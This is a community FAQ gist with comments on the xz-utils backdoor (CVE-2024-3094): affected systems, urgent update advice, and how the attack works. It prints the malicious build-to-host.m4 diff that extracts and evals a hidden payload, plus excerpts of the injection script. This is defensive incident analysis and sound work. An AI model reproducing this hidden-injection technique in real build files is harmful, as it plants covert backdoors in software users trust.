@thesamesam
Last active January 25, 2025 19:00
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in it is written in good faith and to the best of our knowledge, but we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may yet be discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild, where incoming connections activate it and cause performance issues, but we do not yet know what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.
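
As a rough aid for the version criterion above, here is a minimal sketch that classifies a version string. The function name is hypothetical, and it only compares against the two releases named in this document; a match means "investigate and update", not proof that a given distro build contains the backdoor.

```sh
#!/bin/sh
# Sketch: classify an xz/liblzma version string against the two releases
# named above. is_backdoored_xz_version is a hypothetical helper name.
is_backdoored_xz_version() {
    # Drop a packaging suffix such as "-1" before comparing.
    case "${1%%-*}" in
        5.6.0|5.6.1) return 0 ;;   # one of the two known-bad upstream releases
        *)           return 1 ;;   # anything else
    esac
}
```

The version string would typically come from your package manager, for example `dpkg-query -W -f='${Version}' xz-utils` or `rpm -q --qf '%{VERSION}' xz`; package names vary between distros, so treat those as assumptions to adapt.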

We know that the combination of systemd and patched openssh is vulnerable, but pending further analysis of the payload, we cannot be certain that other configurations aren't.

Without wanting to scaremonger, it is important to be clear that at this stage we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc; that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)
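
To see how the shell actually groups that test, here is a small sketch that wraps the quoted expression in a function and runs it on sample build triplets. The helper name and the sample triplets are ours; only the test expression is copied from the snippet. Read literally, the `!` negates only the first group, so the branch is taken when `$build` does not start with `x86_64` but does end in `linux-gnu`. What the script does inside that branch is not quoted here, so the sketch just reports which way the test goes.

```sh
#!/bin/sh
# Sketch: evaluate the quoted condition for a given build triplet.
# build_condition is a hypothetical helper; only the test expression
# itself is copied from the snippet above.
build_condition() {
    build=$1
    if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); then
        echo "branch taken"
    else
        echo "branch not taken"
    fi
}

build_condition x86_64-pc-linux-gnu        # prints: branch not taken
build_condition aarch64-unknown-linux-gnu  # prints: branch taken
```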

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc on either Debian- or Red Hat-derived distributions. Other systems may be vulnerable at this time, but we don't know.
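
The toolchain and packaging tests quoted above can be folded into one predicate to try against your own build environment. This is a sketch under assumptions: the function name is hypothetical, and it assumes both groups of checks must pass for the script to carry on, which the excerpts suggest but do not fully show. It reads the same variables the quoted script reads (`GCC`, `CC`, `LD`, `srcdir`, `RPM_ARCH`).

```sh
#!/bin/sh
# Sketch: mirror the quoted toolchain and packaging tests as one predicate.
# passes_build_gates is a hypothetical name, not part of the real script.
passes_build_gates() {
    # Toolchain: configure detected GCC, the compiler is named exactly
    # "gcc", and the linker identifies itself as GNU ld.
    test "x$GCC" = 'xyes' || return 1
    test "x$CC" = 'xgcc' || return 1
    $LD -v 2>&1 | grep -qs 'GNU ld' || return 1
    # Packaging: a Debian source tree, or an RPM build for x86_64.
    test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"
}
```

Note how narrow the gate is: a build with `CC=clang`, or one run outside a Debian or RPM packaging environment, fails it, which fits the observation that ordinary from-source builds were not the target.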

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
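
Reading the added lines in the diff: `gl_am_configmake` is set to whichever file under `$srcdir` the `grep` finds, `gl_[$1]_prefix` becomes that file's extension, and `gl_[$1]_config` pipes the file through `sed`, then `gl_path_map`, then `$gl_[$1]_prefix -d`. So if the matched file ends in `.xz`, the last stage would be `xz -d`. The sketch below runs the two small text transforms on harmless sample input so you can see what each does in isolation. The function names and the sample path are ours, not from the tarball.

```sh
#!/bin/sh
# Sketch: the two small text transforms the added m4 lines rely on,
# run here on harmless sample input. Function names are hypothetical.

# Same sed expression as gl_[$1]_prefix: keep only what follows the last dot.
last_extension() {
    echo "$1" | sed "s/.*\.//g"
}

# Same tr expression as gl_path_map: swap tab with space and "-" with "_".
path_map() {
    tr "\t \-_" " \t_\-"
}

last_extension tests/files/example.xz   # prints: xz
printf 'a-b_c\n' | path_map             # prints: a_b-c
```

Because the `tr` mapping is its own inverse, applying it twice gives back the original bytes. That would be enough to make a file look corrupt on disk yet be trivially restorable during the build.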

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because other parts of libsystemd depend on it. This is not the fault of systemd; it is simply unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).
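
Since the exposure described above depends on liblzma ending up in sshd's process, one quick thing to look at is whether your sshd's dependency listing mentions it at all. A minimal sketch, assuming `ldd`-style text on stdin (the function name is hypothetical):

```sh
#!/bin/sh
# Sketch: report whether a dynamic-dependency listing mentions liblzma.
# Reads `ldd`-style output on stdin; mentions_liblzma is a hypothetical name.
mentions_liblzma() {
    if grep -q 'liblzma\.so'; then
        echo "liblzma is in the dependency list"
    else
        echo "liblzma is not in the dependency list"
    fi
}
```

Typical use would be `ldd /usr/sbin/sshd | mentions_liblzma`, adjusting the path if your distro installs sshd elsewhere. This only shows what the dynamic linker would pull in at startup. It says nothing about whether the installed liblzma is a backdoored build, and it would not see a library loaded later at runtime.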

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.
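
The landlock item above works because a compile-based feature check cannot tell "the feature is missing" apart from "the test program is broken". Here is a minimal shell sketch of that failure mode. It is not CMake's implementation, and the helper name is ours:

```sh
#!/bin/sh
# Sketch: a feature probe that treats any failure of the check command as
# "feature absent". probe_feature is a hypothetical helper, not CMake code.
probe_feature() {
    if "$@" > /dev/null 2>&1; then
        echo "present"
    else
        echo "absent"
    fi
}
```

With something like `probe_feature cc -c -o /dev/null conftest.c` (where `conftest.c` is a hypothetical test program), a stray character that breaks compilation and a genuinely missing header both print `absent`, and the error output that would distinguish them is thrown away.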

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse began the long work ahead of him.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns that some other projects are affected (either by themselves, or because changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt, but I am listing some examples here which have already been linked widely, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such; please see e.g. https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • take other steps to infest the system (like adding users, authorized_keys, etc.), or whether it can be said with certainty that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???
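
For the tarball-versus-git-tag comparison listed above, a rough starting point is a recursive diff of two already-extracted trees. This is a sketch with a hypothetical helper name; how you obtain the two directories (unpacking the release tarball, exporting the tag) is left to you.

```sh
#!/bin/sh
# Sketch: list paths that differ between two already-extracted source trees.
# compare_trees is a hypothetical helper.
#   $1: directory unpacked from the release tarball
#   $2: directory exported from the matching git tag
compare_trees() {
    # -r recurses; -q reports only which files differ or exist on one side.
    # LC_ALL=C keeps the message text stable across locales.
    LC_ALL=C diff -rq "$1" "$2"
}
```

Expect noise: as described in the Design section, release tarballs legitimately contain generated autotools files that are not in git, so the output needs a human to separate the expected extras from something like a modified `build-to-host.m4`.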

References and other reading material

@Z-nonymous

@Z-nonymous Thanks for your review! I have one thing to underline here - as @Artoria2e5 says:

recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64.

That means, AIUI, your third example never happens in terms of shell scripts, and instead we need to review the case where build is undefined to emulate non-AMD64 situations.

Yes, it could be an attempt to make it harder to identify what platform is target / protected though.

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single com‐
mand. This command is then read and executed by the shell, and
its exit status is returned as the value of eval. If there are
no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real exempted targets.

Insert a Drake meme with "RCE on all Linuxes" vs "RCE on all Linux but the platform I use"

@gh-nate

gh-nate commented Apr 2, 2024

A walkthrough of the xz attack shell script.
An RC4 variant in Awk, what more could you want?
https://research.swtch.com/xz-script
https://hachyderm.io/@rsc/112200603337903320

@xry111

xry111 commented Apr 2, 2024

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single com‐
mand. This command is then read and executed by the shell, and
its exit status is returned as the value of eval. If there are
no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real exempted targets.

No. The code is:

eval `grep ^build=\'x86_64 config.status`

From info bash:

3.5.4 Command Substitution

Command substitution allows the output of a command to replace the
command itself. Command substitution occurs when a command is enclosed
as follows:

$(COMMAND)

or

`COMMAND`

Bash performs the expansion by executing COMMAND in a subshell
environment and replacing the command substitution with the standard
output of the command, with any trailing newlines deleted.

So after command substitution it becomes:

eval build='x86_64-pc-linux-gnu'

And yes the exit code is still discarded, but the command build='x86_64-pc-linux-gnu' is still executed by the shell. You can try an example:

cat > config.status << EOF
unrelated_thing_1='114514'
build='x86_64-linux-gnu'
unrelated_thing_2='1919810'
EOF

eval `grep ^build=\'x86_64 config.status`
echo $build

It will output x86_64-linux-gnu. So this line is not a no-op, it basically reads the variable "build" out of config.status.

@erinacio

erinacio commented Apr 2, 2024

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresponsible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

You just misinterpreted what I meant. Even a simple notice like "We're not affected." is sufficient in such a case. A more comprehensive notice (like what Arch did) could be better, but is not strictly required.

I think it's a basic responsibility for a distro maintainer to publish such notice. I didn't mean and never mean Debian or Red Hat or anything is superior and users should switch to them. Just because they're affected and they have a wide user adoption I took them as examples. openSUSE also published a great guide and was affected but because it seems to have less adoption I didn't list it in my original comment.

Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl?

Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

@Osiris-Team

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

@Artoria2e5

Artoria2e5 commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it shipped backdoored versions in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.) There is a clarification that libsystemd is not present, so it could not have affected sshd, but it's not the same level of assurance as "the code is simply not there".


@Osiris-Team XZ for Java is not known to be affected by this backdoor. It's not as easy to hide bad things in pure Java code...

@Gasu16

Gasu16 commented Apr 2, 2024

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

It is still considered to be safe at the moment. The latest commits were made by the original authors; Jia Tan committed in January 2024, updating the README's bug-report information.

https://git.tukaani.org/?p=xz-java.git;a=shortlog;pg=0
https://blog.sonatype.com/cve-2024-3094-the-targeted-backdoor-supply-chain-attack-against-xz-and-liblzma
https://security.apache.org/blog/cve-2024-3094/

@erinacio

erinacio commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.
Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it's affected in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @​dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.)

Well, I think a false positive is tolerable in such a case, especially given that the last section of the notice indicated that Arch might not be affected, since liblzma is not dynamically linked into sshd. At that time we just didn't have enough understanding of the backdoor. It was annoying but won't cause real damage, in contrast to a false negative.

@Artoria2e5

Artoria2e5 commented Apr 2, 2024

@flybyray

The eval [...] could do harm for the generic vanilla kernel builds.

It could, indeed in theory, replace the whole script there with an early exit. It could even, in theory, manage to add a module to the kernel.

It does not though. There is simply no evidence of this attack having anything to do with the kernel.

The kernel's xz decompressor is extremely stripped down. It's been forked off since before JT took over. (This only means the decompressor is likely not backdoored. This would not stop a new version of malicious xz from adding a module.)

ask your self why they used sh as a pipe target and not as others (KBZIP2,LZMA,ZSTD,...) the tool itself. the shell process will populate a lot more background information useful to activate the payload injections.

The answer is right there in xz_wrap.sh, in case $SRCARCH in. Each architecture has its own branch/call/jump filters that help improve compression ratio by (reversibly) turning relative jump addresses into absolute addresses.

as this is just committed short before public announcement of this CVE

What is "this"? xz_wrap was recently changed by Lasse, but the changes are reasonable and do not introduce any new eval; the options are consistent with manpage recommendations. The Makefiles were recently changed for version and other reasons, not much to do with xz.

The more pertinent "time pressure" theory is from Solar Designer: https://www.openwall.com/lists/oss-security/2024/03/31/9. It turns out libsystemd decided to load liblzma lazily (dlopen()) in a future version, so if the payload isn't pushed out now, it would stop working soon.

@AdrianBunk

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?

These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

@christoofar

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresponsible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

There's not one specific point in the chain that's a concern, there's like 10+ of them. And what's really disappointing to see is the rush to moan about focus of any particular part of the chain and squash any enthusiasm to rethink any part of it.

@dguerri

dguerri commented Apr 2, 2024

Quick Docker setup based on xzbot, to demonstrate backdoor usage

@przemoc

przemoc commented Apr 2, 2024

My attempt at collecting and organizing links related to xz backdoor (2024) aka CVE-2024-3094.

https://przemoc.github.io/xz-backdoor-links/
or
https://github.com/przemoc/xz-backdoor-links/blob/main/index.mm.md

Nothing new there (sorry for that), but for those who are late to the news (I guess that's less and less possible every minute), it may help a little in navigating the various resources related to this topic.

@fungilife

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?
These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

Despite what I read here and in the openwall discussions, a slight doubt remains in my head. If systemd were portable to musl and packages were built like in debian/rh, would the same mechanism be effective, or is musl making a difference elsewhere, as in the compiling and linking process of xz/lzma? Otherwise it seems that if sd_notify doesn't trigger a process, the rest is just dirt sitting beside library items, not replacing or modifying anything else.

By the way, arch had built two versions that were infected, 5.6.0-1 and 5.6.1-1, 5.6.1-2 was built from git not tarball with the distro's native tools, 5.6.1-3 was built from git.tukaani.org those are the discovered infected tar balls, but the same entity has signed tarballs further back retroactively.

@redcode

redcode commented Apr 2, 2024

@thesamesam Does anyone have IRC logs, and if yes are they being analyzed?
These should contain hints about timezone, location, mother tongue and cultural background of the attacker.

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

Who are you to decide what the object should be here or how to narrow down what people want to investigate? Let Sam ask for whatever he wants, besides, the gist is his and he's doing a good job.

You are nobody's boss, so don't be impertinent.

@marco-silva0000

How hard is it to be objective and civil these days?
This is the logging policy, https://libera.chat/policies/#public-logging
Also, I haven't seen any logs shared anywhere.
I think there's value in that type of analysis, but ultimately it can be considered out of scope of this gist by its creator.

@orbea

orbea commented Apr 2, 2024

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

The state agencies may be involved in this themselves and knowing who organized this attack may shed light on what kind of payload was going to be used or who the intended targets were. I don't think it is wise to prematurely shut down any relevant avenue of investigation.

@wibeipummedo

wibeipummedo commented Apr 2, 2024

Saw an interesting commit over in cpython: python/cpython@ea51476

It's part of PR python/cpython#115989

The bytecode there seems to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)
b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c)
c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91)
d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent the build failing' - different scenario, and it kind of makes sense, but it reminds me of the apparent reasoning for 'fixing' the valgrind issue. (https://github.com/python/cpython/pull/115989/files#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident. EDIT as said below by AdrianBunk and others, probably is just bad timing after all. NM

@DiagonalArg

DiagonalArg commented Apr 3, 2024

This is not the object here, please concentrate. It is not a Hollywood police movie we are living in. The focus should be at the object not the subject responsible. State agencies I am sure have their own forums and discussion panels to investigate what they do.

The state agencies may be involved in this themselves and knowing who organized this attack may shed light on what kind of payload was going to be used or who the intended targets were. I don't think it is wise to prematurely shut down any relevant avenue of investigation.

Agreed. Also, discussing who is responsible is necessary to work out the team or network of sockpuppets that may be involved. That may help identify other PRs that may be prongs of the attack, or other, as yet unidentified, attacks.

@christoofar

cpython is just a binding project... all you should care about is Is The Binding Alive??? you would normally just compress and decompress some test string and call it a day.
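
For illustration, a binding-level smoke test of the kind described above might look like the following. This is only a minimal sketch using Python's standard `lzma` module; the helper name `roundtrip_ok` and the sample payload are made up for this example and are not taken from the cpython PR.

```python
import lzma


def roundtrip_ok(payload: bytes) -> bool:
    """Compress payload into an .xz container, decompress it again,
    and report whether the original bytes came back unchanged."""
    compressed = lzma.compress(payload, format=lzma.FORMAT_XZ)
    return lzma.decompress(compressed) == payload


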